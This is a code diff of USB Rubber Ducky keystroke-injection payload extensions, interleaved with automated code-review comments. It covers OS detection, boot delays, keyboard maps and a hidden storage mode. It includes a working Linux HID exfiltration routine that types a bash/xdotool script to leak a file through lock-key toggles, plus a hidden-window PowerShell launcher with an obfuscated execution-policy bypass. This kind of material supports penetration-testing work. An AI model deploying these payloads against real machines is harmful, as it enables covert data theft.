diff --git a/languages/de.json b/languages/de.json index fe65926..90964e2 100644 --- a/languages/de.json +++ b/languages/de.json @@ -98,6 +98,7 @@ "DOWNARROW":"00,00,51", "UP":"00,00,52", "UPARROW":"00,00,52", + "NUMLOCK":"00,00,53", "<":"00,00,64", "APP":"00,00,65", "MENU":"00,00,65", diff --git a/languages/gb.json b/languages/gb.json index 2fd45d8..0dc0435 100644 --- a/languages/gb.json +++ b/languages/gb.json @@ -56,6 +56,7 @@ "ENTER":"00,00,28", "ESC":"00,00,29", "ESCAPE":"00,00,29", + "BACKSPACE":"00,00,2a", "TAB":"00,00,2b", " ":"00,00,2c", "SPACE":"00,00,2c", @@ -102,10 +103,26 @@ "DOWNARROW":"00,00,51", "UP":"00,00,52", "UPARROW":"00,00,52", + "NUMLOCK":"00,00,53", + "KPAD_SLASH":"00,00,54", + "KPAD_ASTERISK":"00,00,55", + "KPAD_MINUS":"00,00,56", + "KPAD_PLUS":"00,00,57", + "KPAD_ENTER":"00,00,58", + "KPAD_1":"00,00,59", + "KPAD_2":"00,00,5a", + "KPAD_3":"00,00,5b", + "KPAD_4":"00,00,5c", + "KPAD_5":"00,00,5d", + "KPAD_6":"00,00,5e", + "KPAD_7":"00,00,5f", + "KPAD_8":"00,00,60", + "KPAD_9":"00,00,61", + "KPAD_0":"00,00,62", + "KPAD_DOT":"00,00,63", "\\":"00,00,64", "APP":"00,00,65", "MENU":"00,00,65", - "ALT-TAB":"00,00,71", "CONTROL":"01,00,00", "CTRL":"01,00,00", "SHIFT":"02,00,00", @@ -137,6 +154,7 @@ "Z":"02,00,1d", "!":"02,00,1e", "\"":"02,00,1f", + "£":"02,00,20", "$":"02,00,21", "%":"02,00,22", "^":"02,00,23", 
@@ -151,19 +169,26 @@ "~":"02,00,31", ":":"02,00,33", "@":"02,00,34", + "¬":"02,00,35", "<":"02,00,36", ">":"02,00,37", "?":"02,00,38", "|":"02,00,64", "CTRL-SHIFT":"03,00,00", "ALT":"04,00,00", + "ALT-TAB":"04,00,2b", "CTRL-ALT":"05,00,00", "ALT-SHIFT":"06,00,00", - "COMMAND":"08,00,00", "GUI":"08,00,00", "WINDOWS":"08,00,00", - "COMMAND-OPTION":"12,00,00", - "COMMAND-CTRL-SHIFT":"12,00,00", - "COMMAND-CTRL":"12,00,00", - "COMMAND-OPTION-SHIFT'":"12,00,00" + "COMMAND":"08,00,00", + "COMMAND-CTRL":"09,00,00", + "COMMAND-CTRL-SHIFT":"0b,00,00", + "COMMAND-OPTION":"0c,00,00", + "COMMAND-OPTION-SHIFT'":"0e,00,00", + "ALTGR":"40,00,00", + "ALTGR-TAB":"40,00,2b", + "¦":"40,00,35", + "CTRL-ALTGR":"41,00,00", + "ALTGR-SHIFT":"42,00,00" } \ No newline at end of file diff --git a/payloads/extensions/community/Rolling_Powershell_Execution b/payloads/extensions/community/Rolling_Powershell_Execution index 38c29e4..e85281c 100644 --- a/payloads/extensions/community/Rolling_Powershell_Execution +++ b/payloads/extensions/community/Rolling_Powershell_Execution @@ -51,7 +51,8 @@ EXTENSION Rolling_Powershell_Execution STRING powershell.exe -noP -nOnI -windo H END_IF - IF_DEFINED #EXECUTIONPOLICY + + IF_DEFINED_TRUE #EXECUTIONPOLICY SPACE IF (($RANDOM_PS % 2) == 0) THEN STRING -ep ByPasS diff --git a/payloads/extensions/detect_ready.txt b/payloads/extensions/detect_ready.txt index 201405a..83356d6 100644 --- a/payloads/extensions/detect_ready.txt +++ b/payloads/extensions/detect_ready.txt 
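Review bot: The rewritten modifier entry `"COMMAND-OPTION-SHIFT'":"0e,00,00"` keeps a stray apostrophe inside the key, so a payload that writes `COMMAND-OPTION-SHIFT` cannot resolve to this mapping; the key should be `"COMMAND-OPTION-SHIFT":"0e,00,00"`. The removed line carried the same typo, so this rewrite is the natural place to drop it rather than carry it into the new byte values. The file also still ends without a trailing newline, which git flags on every future diff of it.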
@@ -1,23 +1,26 @@
 EXTENSION DETECT_READY
- REM VERSION 1.0
+ REM VERSION 1.1
+ REM AUTHOR: Korben
- REM USAGE:
- REM Extension runs inline (here)
- REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
- REM boot delay
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
- REM TARGETS:
- REM Any system that reflects CAPSLOCK will detect minimum required delay
- REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
  REM CONFIGURATION:
- DEFINE RESPONSE_DELAY 25
- DEFINE ITERATION_LIMIT 120
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
  VAR $C = 0
- WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
  CAPSLOCK
- DELAY RESPONSE_DELAY
+ DELAY #RESPONSE_DELAY
  $C = ($C + 1)
  END_WHILE
  CAPSLOCK
diff --git a/payloads/extensions/exfil_auto_eof_detect.txt b/payloads/extensions/exfil_auto_eof_detect.txt
index 2d7c5f5..ff1a28d 100644
--- a/payloads/extensions/exfil_auto_eof_detect.txt
+++ b/payloads/extensions/exfil_auto_eof_detect.txt
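Review bot: The 3000ms maximum stated in the new `TARGETS:` block is just `#ITERATION_LIMIT 120` times `#RESPONSE_DELAY 25`, but nothing in the file ties the two together, so editing either define silently makes the documentation wrong. A comment beside the defines, `REM max boot delay = #ITERATION_LIMIT * #RESPONSE_DELAY ms (120 * 25 = 3000ms)`, keeps the relationship visible to whoever retunes them. The documentation block would then only need to say "see CONFIGURATION" instead of repeating the number.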
@@ -1,18 +1,24 @@
 EXTENSION EXFIL_AUTO_EOF_DETECT
- REM VERSION 1.0
+ REM VERSION 1.1
+ REM AUTHOR: Korben
- REM USAGE:
- REM Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
- REM TARGETS:
- REM Any; intended for use on systems that dont reflect more than 2 lock keys
+ TARGETS:
+ Requires reflection of at least 2 lock keys.
+ Intended for use on systems that dont reflect more than 2 lock keys.
+ END_REM
+
+ REM CONFIGURATION
+ DEFINE #INACTIVTY_TARGET 10
  FUNCTION WAIT_FOR_EOF()
  VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON
  VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON
  VAR $PROCESSING = TRUE
  VAR $INACTIVITY_COUNT = 0
- DEFINE INACTIVTY_TARGET 10
  WHILE ($PROCESSING)
  DELAY 20
  IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN
@@ -25,7 +31,7 @@ EXTENSION EXFIL_AUTO_EOF_DETECT
  LED_R
  ELSE
  $INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)
- IF ($INACTIVTY_COUNT >= INACTIVTY_TARGET) THEN
+ IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN
  $PROCESSING = FALSE
  END_IF
  LED_OFF
diff --git a/payloads/extensions/hello_os.txt b/payloads/extensions/hello_os.txt
index 8650c7f..a606539 100644
--- a/payloads/extensions/hello_os.txt
+++ b/payloads/extensions/hello_os.txt
@@ -1,13 +1,17 @@
 EXTENSION HELLO_OS
- REM VERSION 1.0
+ REM VERSION 1.1
+ REM AUTHOR: Korben
- REM USAGE:
- REM For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
- REM prints the OS determination
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
+ prints the OS determination
+ END_REM
  REM Additional Example: Defining custom $_OS enums
- DEFINE SOME_OTHER_OS 6
- DEFINE ANOTHER_OS 7
+ DEFINE #EXTRA_EXAMPLES FALSE
+ DEFINE #SOME_OTHER_OS 6
+ DEFINE #ANOTHER_OS 7
  FUNCTION HELLO_OS()
  IF ($_OS == WINDOWS) THEN
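Review bot: The changed comparison `IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN` reads `$INACTIVTY_COUNT`, but the variable the first hunk declares is `VAR $INACTIVITY_COUNT = 0`; the counter that is incremented and tested is never the one that is initialised, so the cutoff depends on how the compiler treats an undeclared `$` name (not visible from the diff). Rename the increment and the comparison to `$INACTIVITY_COUNT`, or the declaration to match, so the two agree; `#INACTIVTY_TARGET` is at least spelled consistently in its define and its use. WAIT_FOR_EOF's body continues outside the hunk.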
@@ -22,12 +26,14 @@ EXTENSION HELLO_OS
  STRING Hello ChromeOS!
  ELSE IF ($_OS == ANDROID) THEN
  STRING Hello Android!
- ELSE IF($_OS == SOME_OTHER_OS) THEN
- REM Example Only
- STRING HELLO Custom OS Type!
- ELSE IF($_OS == ANOTHER_OS) THEN
- REM Example Only
- STRING HELLO Another Custom OS Type!
+ IF_DEFINED_TRUE #EXTRA_EXAMPLES
+ ELSE IF($_OS == #SOME_OTHER_OS) THEN
+ REM Example Only
+ STRING HELLO Custom OS Type!
+ ELSE IF($_OS == #ANOTHER_OS) THEN
+ REM Example Only
+ STRING HELLO Another Custom OS Type!
+ END_IF_DEFINED
  ELSE
  STRING Hello World!
  END_IF
diff --git a/payloads/extensions/linux_hid_exfil.txt b/payloads/extensions/linux_hid_exfil.txt
index fe3a42b..8df8409 100644
--- a/payloads/extensions/linux_hid_exfil.txt
+++ b/payloads/extensions/linux_hid_exfil.txt
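Review bot: `DEFINE #ANOTHER_OS 7` in the first hunk reuses the value that `passive_windows_detect.txt` in this same commit assigns to `#NOT_WINDOWS 7`, so a payload that includes both extensions has `$_OS == 7` greeted as "Another Custom OS Type" by HELLO_OS while the detector meant "not Windows". Since these are only example enums, either pick values no shipped extension uses or add to the `REM_BLOCK` a line such as `Custom $_OS values must not collide with values used by other extensions (e.g. #NOT_WINDOWS in PASSIVE_WINDOWS_DETECT)`. The example branches are now spliced into the middle of an `ELSE IF` chain by `IF_DEFINED_TRUE #EXTRA_EXAMPLES`; this presumably relies on the preprocessor removing the lines wholesale when the define is FALSE, which is worth one comment above the block for readers unfamiliar with that behaviour.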
@@ -1,44 +1,94 @@ EXTENSION LINUX_HID_EXFIL - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION + REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT - REM Helpers for Linux Keystroke Reflection data exfiltration - REM This payload is a proof of concept for USB HID only Data Exfiltration + REM_BLOCK DOCUMENTATION + Helpers for Linux Keystroke Reflection data exfiltration + This payload is a proof of concept for USB HID only Data Exfiltration - REM TARGET: - REM Linux Host that supports opening terminal via CTRL ALT t, and xdotool + TARGET: + Linux host that supports opening terminal via CTRL ALT t, and xdotool - REM USAGE: - REM Uncomment the function call below to run this extension inline - REM or call RUN_LINUX_EXFIL() anywhere in your payload after the extension + USAGE: + REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION + Prepare data to exfil (in filename defined by TARGET_FILE below) + with a terminal window already open - call RUN_LINUX_EXFIL() - REM DEPLOYMENT: - REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. + DEPLOYMENT: + Plug Ducky into host, wait for the LED to turn (and stay) solid Green. 
+ END_REM REM CONFIGURATION: REM File on host machine to exfil using Keystroke Reflection attack - DEFINE TARGET_FILE t.txt - DEFINE TERMINAL_OPEN_DELAY 500 - DEFINE READY_TO_TYPE_DELAY 250 + DEFINE #TARGET_FILE filename.txt + + DEFINE #SAVE_AND_RESTORE_LOCKS TRUE + DEFINE #ENABLE_EXFIL_LEDS TRUE + DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE + + REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL() + DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE + FUNCTION RUN_LINUX_EXFIL() - LED_OFF - DELAY READY_TO_TYPE_DELAY - CTRL ALT t - DELAY TERMINAL_OPEN_DELAY - SAVE_HOST_KEYBOARD_LOCK_STATE + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + LED_OFF + $_EXFIL_LEDS_ENABLED = TRUE + END_IF_DEFINED + + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + SAVE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED + $_EXFIL_MODE_ENABLED = TRUE - $_EXFIL_LEDS_ENABLED = TRUE - STRINGLN uname -a > TARGET_FILE - STRINGLN c="xdotool key --delay 4";o=" Caps_Lock";l=" Num_Lock";bs=$(xxd -b TARGET_FILE |cut -d " " -f2-7);for (( i=0;i<${#bs};i++ ));do b="${bs:$i:1}";if [[ "$b" == "0" ]];then c+=$o;fi;if [[ "$b" == "1" ]];then c+=$l;fi;done;eval "$c";exit + STRING_BASH + c="xdotool key --delay 4"; + bs=$(xxd -b + #TARGET_FILE + |cut -d" " -f2-7); + for((i=0;i<${#bs};i++));do + b="${bs:$i:1}"; + if [[ "$b" == "0" ]];then + c+=" Caps_Lock"; + fi; + if [[ "$b" == "1" ]];then + c+=" Num_Lock"; + fi; + done; + $c; + END_STRING + + IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL + STRING exit; + END_IF_DEFINED + + ENTER + + REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one WAIT_FOR_EOF() - $_EXFIL_LEDS_ENABLED = FALSE + $_EXFIL_MODE_ENABLED = FALSE - RESTORE_HOST_KEYBOARD_LOCK_STATE + + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + $_EXFIL_LEDS_ENABLED = FALSE + END_IF_DEFINED + + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + RESTORE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED END_FUNCTION - REM Uncomment the function call below to run this extension inline (here) - REM or call RUN_WINDOWS_EXFIL() anywhere in your 
payload after the extension - - REM RUN_LINUX_EXFIL() + IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO + REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template. + REM DEMO Boot Delay + DELAY 3000 + REM Open Terminal + CTRL ALT t + DELAY 500 + REM Perpare some data in TARGET_FILE + STRINGLN uname -a>#TARGET_FILE + REM Exfil data to USB Rubber Ducky using Keystroke Reflection + RUN_LINUX_EXFIL() + END_IF_DEFINED END_EXTENSION diff --git a/payloads/extensions/os_detect.txt b/payloads/extensions/os_detect.txt index 77c9275..1df4013 100644 --- a/payloads/extensions/os_detect.txt +++ b/payloads/extensions/os_detect.txt 
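Review bot: `REM Perpare some data in TARGET_FILE` in the new demo block misspells Prepare, and both it and the `USAGE:` text refer to `TARGET_FILE` without the `#` that the define and every code use now carry; `REM Prepare some data in #TARGET_FILE` fixes both. The dependency on the other extension is stated twice with different wording, `REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT` at the top and `REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION` inside the doc block, then a third time above the `WAIT_FOR_EOF()` call; one statement in the doc block that also names the required ordering ("must be placed above this extension") is clearer than three. The DEPLOYMENT text still says to wait for solid green, but nothing in RUN_LINUX_EXFIL sets `LED_G`, so that sentence appears to describe behaviour that lives outside this file or no longer exists.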
@@ -1,202 +1,217 @@ EXTENSION OS_DETECTION - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM USB Rubber Ducky Host OS Detection - REM Generic OS detection at a high view is a moving target - REM results may vary greatly depending - REM on a combination of many variables: - REM - number of testing stages - REM - specific devices and versions tested against - REM - number of systems testing for (scope) - REM - detection techniques (passive/invisible/active/hybrid) - REM - overall speed - REM - overall accuracy + REM_BLOCK DOCUMENTATION + USB Rubber Ducky Host OS Detection + Generic OS detection at a high view is a moving target + results may vary greatly depending + on a combination of many variables: + - number of testing stages + - specific devices and versions tested against + - number of systems testing for (scope) + - detection techniques (passive/invisible/active/hybrid) + - overall speed + - overall accuracy - REM TARGET: - REM DEFAULT - Windows, Mac, Linux - REM ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android + If all you require is windows vs detection, the + PASSIVE_WINDOWS_DETECT extension is recommended over this extension. 
- REM USAGE: - REM Uncomment the function call below to run this extension inline (here) - REM or call DETECT_OS() anywhere in your payload after the extension - REM Place this extension and the DETECT_OS() before - REM you would like to first reference $_OS to execute payload code conditionally + TARGET: + DEFAULT - Windows, Mac, Linux + ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android + + USAGE: + Uncomment the function call below to run this extension inline (here) + or call DETECT_OS() anywhere in your payload after the extension + Place this extension and the DETECT_OS() before + you would like to first reference $_OS to execute payload code conditionally + + FEEDBACK: + As mentioned above, this a moving target (especially for mac systems) + Please report any issues identifying specific operating systems. + Your feedback will greatly help solidify the robustness of this extension + + DEBUGGING: + SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output + END_REM REM CONFIGURATION: - DEFINE VERBOSE FALSE - DEFINE ADVANCED_DETECTION FALSE - DEFINE STARTUP_DELAY 1500 - DEFINE RESTART_WAIT 1000 - DEFINE CONNECT_WAIT 1000 - DEFINE OS_DETECT_MODE HID - DEFINE OS_DETECT_VID VID_05AC - DEFINE OS_DETECT_PID PID_021E - DEFINE WINDOWS_HOST_REQUEST_COUNT 2 - DEFINE HOST_RESPONSE_TIMEOUT 1000 + REM For Debugging: + DEFINE #DEBUGGING_OUTPUT FALSE + DEFINE #ADVANCED_DETECTION FALSE + REM Timing fine tuning: + DEFINE #STARTUP_DELAY 1500 + DEFINE #RESTART_WAIT 1000 + DEFINE #CONNECT_WAIT 1000 + DEFINE #OS_DETECT_MODE HID + DEFINE #OS_DETECT_VID VID_05AC + DEFINE #OS_DETECT_PID PID_021E + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #HOST_RESPONSE_TIMEOUT 1000 FUNCTION DETECT_OS() $_HOST_CONFIGURATION_REQUEST_COUNT = 0 - ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID - DELAY STARTUP_DELAY + ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID + DELAY #STARTUP_DELAY SAVE_HOST_KEYBOARD_LOCK_STATE - IF VERBOSE THEN 
- IF ADVANCED_DETECTION THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT + IF_DEFINED_TRUE #ADVANCED_DETECTION STRING ADVANCED OS DETECT - ELSE + ELSE_DEFINED STRING OS DETECT - END_IF + END_IF_DEFINED ENTER STRING test caps - END_IF + END_IF_DEFINED IF ($_CAPSLOCK_ON == FALSE) THEN LED_R CAPSLOCK - DELAY HOST_RESPONSE_TIMEOUT + DELAY #HOST_RESPONSE_TIMEOUT END_IF LED_OFF - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING test done - END_IF + END_IF_DEFINED IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING received led response - END_IF + END_IF_DEFINED LED_G - IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN - IF VERBOSE THEN + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING prediction: Windows - END_IF + END_IF_DEFINED $_OS = WINDOWS ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING prediction: Linux - END_IF + END_IF_DEFINED $_OS = LINUX END_IF ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no led response ENTER STRING prediciton: MacOS - END_IF + END_IF_DEFINED $_OS = MACOS END_IF - IF ADVANCED_DETECTION THEN + IF_DEFINED_TRUE #ADVANCED_DETECTION IF ( $_OS == LINUX ) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING soft reconnect - END_IF + END_IF_DEFINED ATTACKMODE OFF - DELAY RESTART_WAIT - ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID - DELAY CONNECT_WAIT - IF VERBOSE THEN + DELAY #RESTART_WAIT + ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID + DELAY #CONNECT_WAIT + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING reconnected - END_IF + END_IF_DEFINED IF ($_CAPSLOCK_ON == TRUE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING caps led on ENTER STRING test numlock - END_IF + END_IF_DEFINED NUMLOCK - DELAY HOST_RESPONSE_TIMEOUT - IF VERBOSE THEN + DELAY #HOST_RESPONSE_TIMEOUT + 
IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING test done - END_IF + END_IF_DEFINED IF ($_NUMLOCK_ON == FALSE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no numlock led ENTER STRING prediciton: ChromeOS - END_IF + END_IF_DEFINED $_OS = CHROMEOS ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING numlock led on ENTER STRING testing scrolllock - END_IF + END_IF_DEFINED SCROLLLOCK - DELAY HOST_RESPONSE_TIMEOUT - IF VERBOSE THEN + DELAY #HOST_RESPONSE_TIMEOUT + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING test done - END_IF + END_IF_DEFINED IF ($_SCROLLLOCK_ON == TRUE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING scrolllock led on ENTER STRING prediciton: Android - END_IF + END_IF_DEFINED $_OS = ANDROID ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no scrolllock reply ENTER STRING prediction: Linux - END_IF + END_IF_DEFINED $_OS = LINUX END_IF END_IF END_IF ELSE IF ($_OS == MACOS) THEN IF ($_CAPSLOCK_ON == TRUE) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING caps led on ENTER STRING prediction: iOS - END_IF + END_IF_DEFINED $_OS = IOS ELSE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING no caps reply ENTER STRING prediction: MacOS - END_IF + END_IF_DEFINED $_OS = MACOS END_IF ELSE IF ($_OS == WINDOWS) THEN - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING Confident Windows Prediction - END_IF + END_IF_DEFINED $_OS = WINDOWS END_IF - END_IF + END_IF_DEFINED RESTORE_HOST_KEYBOARD_LOCK_STATE - IF VERBOSE THEN + IF_DEFINED_TRUE #DEBUGGING_OUTPUT ENTER STRING OS_DETECT complete ENTER - END_IF + END_IF_DEFINED END_FUNCTION REM Uncomment the function call below to run this extension inline (here) REM or call DETECT_OS() anywhere in your payload after the extension - REM DETECT_OS() END_EXTENSION 
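Review bot: The new documentation line `If all you require is windows vs detection, the` is missing its object and presumably should read `If all you require is Windows vs. not-Windows detection, the`. The `DEBUGGING:` entry names `DEBUGGING_OUTPUT DEFINE` while the define itself is `#DEBUGGING_OUTPUT`; using the `#` form in the doc avoids a second spelling to keep in sync. The debug strings `STRING prediciton: MacOS`, `STRING prediciton: ChromeOS` and `STRING prediciton: Android` are unchanged context typos that the commit could fold in while it rewrites every line around them. DETECT_OS is fully inside this hunk, but the hunk's line breaks are collapsed here, so I have not checked that every `IF_DEFINED_TRUE` gained a matching `END_IF_DEFINED`.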
diff --git a/payloads/extensions/passive_detect_ready.txt b/payloads/extensions/passive_detect_ready.txt
index 1551c44..8577757 100644
--- a/payloads/extensions/passive_detect_ready.txt
+++ b/payloads/extensions/passive_detect_ready.txt
@@ -1,21 +1,24 @@
 EXTENSION PASSIVE_DETECT_READY
- REM VERSION 1.0
+ REM VERSION 1.1
+ REM AUTHOR: Korben
- REM Passive Detect Ready - no injection dynamic boot delay
- REM for hosts that reflect current OS lock key state on connect
+ REM_BLOCK DOCUMENTATION
+ Passive Detect Ready - no injection dynamic boot delay
+ for hosts that reflect current OS lock key state on connect
- REM USAGE:
- REM Extension runs inline (here)
- REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
- REM boot delay
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ END_REM
  REM CONFIGURATION:
- DEFINE MAX_WAIT 150
- DEFINE CHECK_INTERVAL 20
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
- VAR $MAX_TRIES = MAX_WAIT
+ VAR $MAX_TRIES = #MAX_WAIT
  WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
- DELAY CHECK_INTERVAL
+ DELAY #CHECK_INTERVAL
  $MAX_TRIES = ($MAX_TRIES - 1)
  END_WHILE
  END_EXTENSION
diff --git a/payloads/extensions/passive_windows_detect.txt b/payloads/extensions/passive_windows_detect.txt
index 1edd416..80822c4 100644
--- a/payloads/extensions/passive_windows_detect.txt
+++ b/payloads/extensions/passive_windows_detect.txt
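Review bot: `#MAX_WAIT 150` is copied into `$MAX_TRIES` and decremented once per `DELAY #CHECK_INTERVAL`, so it is a poll count, not a duration; the name reads as milliseconds while the real ceiling is 150 polls × 20ms = 3000ms. Either rename it (`#MAX_POLLS`) with the doc block updated, or keep the name and add `REM number of #CHECK_INTERVAL polls; max wait = #MAX_WAIT * #CHECK_INTERVAL ms` next to the define. The same pair of defines with the same naming appears in `passive_windows_detect.txt` in this commit and should get whichever fix is chosen here.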
@@ -1,37 +1,42 @@
 EXTENSION PASSIVE_WINDOWS_DETECT
- REM VERSION 1.0
+ REM VERSION 1.1
+ REM AUTHOR: Korben
- REM Windows fully passive OS Detection and passive Detect Ready
- REM Includes its own passive detect ready. Does not require
- REM additional extensions
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
- REM USAGE:
- REM Extension runs inline (here)
- REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
- REM boot delay
- REM $_OS will be set to WINDOWS or NOT_WINDOWS
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
  REM CONFIGURATION:
- DEFINE MAX_WAIT 150
- DEFINE CHECK_INTERVAL 20
- DEFINE WINDOWS_HOST_REQUEST_COUNT 2
- DEFINE NOT_WINDOWS 7
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
- VAR $MAX_TRIES = MAX_WAIT
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
  WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
- DELAY CHECK_INTERVAL
+ DELAY #CHECK_INTERVAL
  $MAX_TRIES = ($MAX_TRIES - 1)
  END_WHILE
- IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
  $_OS = WINDOWS
- ELSE
- $_OS = NOT_WINDOWS
  END_IF
- REM EXAMPLE USAGE AFTER EXTENSION
- REM IF ($_OS == WINDOWS) THEN
- REM STRING HELLO WINDOWS!
- REM ELSE
- REM STRING HELLO WORLD!
- REM END_IF
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
  END_EXTENSION
diff --git a/payloads/extensions/protected_storage_mode.txt b/payloads/extensions/protected_storage_mode.txt
index 4659cf8..e33a6cf 100644
--- a/payloads/extensions/protected_storage_mode.txt
+++ b/payloads/extensions/protected_storage_mode.txt
@@ -1,38 +1,62 @@ EXTENSION PROTECTED_STORAGE_MODE - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM Example hidden storage mode - REM Forces user to padlock style unlock storage mode by setting - REM the HOSTs lock keys and pressing the duck button to submit a - REM combination three times. - REM The wrong combination will immediately fail silently. - REM The correct combination will trigger ATTACKMODE STORAGE and LED_G + REM_BLOCK + Example hidden storage mode + Forces user to padlock style unlock storage mode by setting + the HOSTs lock keys and pressing the duck button to submit a + combination three times. + The wrong combination will immediately fail silently. + The correct combination will trigger ATTACKMODE STORAGE and LED_G - REM TARGET: - REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK + TARGET: + Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK - REM USAGE: - REM BUTTON_DEF - REM STORAGE_PASSWORD_CHECK() - REM END_BUTTON + USAGE: + BUTTON_DEF + STORAGE_PASSWORD_CHECK() + END_BUTTON + + CONFIGURATION: + Available combinations provided as DEFINEs below, + change within the STORAGE_PASSWORD_CHECK as desired + + Method of input submission can be changed using 